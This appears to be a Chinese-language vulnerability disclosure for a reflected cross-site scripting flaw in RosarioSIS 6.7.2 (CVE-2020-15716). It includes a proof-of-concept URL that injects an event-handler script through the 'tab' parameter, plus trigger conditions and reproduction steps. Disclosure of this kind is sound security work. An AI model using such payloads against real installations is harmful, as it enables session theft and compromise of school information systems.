RosarioSIS 6.7.2 跨站脚本漏洞技术详情

本文详细披露了RosarioSIS 6.7.2版本中存在的一个跨站脚本漏洞,提供了漏洞的原理、触发条件、概念验证代码以及复现步骤,涉及CVE-2020-15716。

漏洞标题:RosarioSIS 6.7.2 - 跨站脚本漏洞

日期:2025-11-25

漏洞作者:CodeSecLab

厂商主页:https://gitlab.com/francoisjacquet/rosariosis

软件链接:https://gitlab.com/francoisjacquet/rosariosis

版本:6.7.2

测试平台:Windows

CVE:CVE-2020-15716

概念验证 

1

http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22

触发条件

  1. 用户必须已通过认证(如 Warehous.php 中的会话检查所示)
  2. 请求中不能包含 modfunc 参数

复现步骤

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次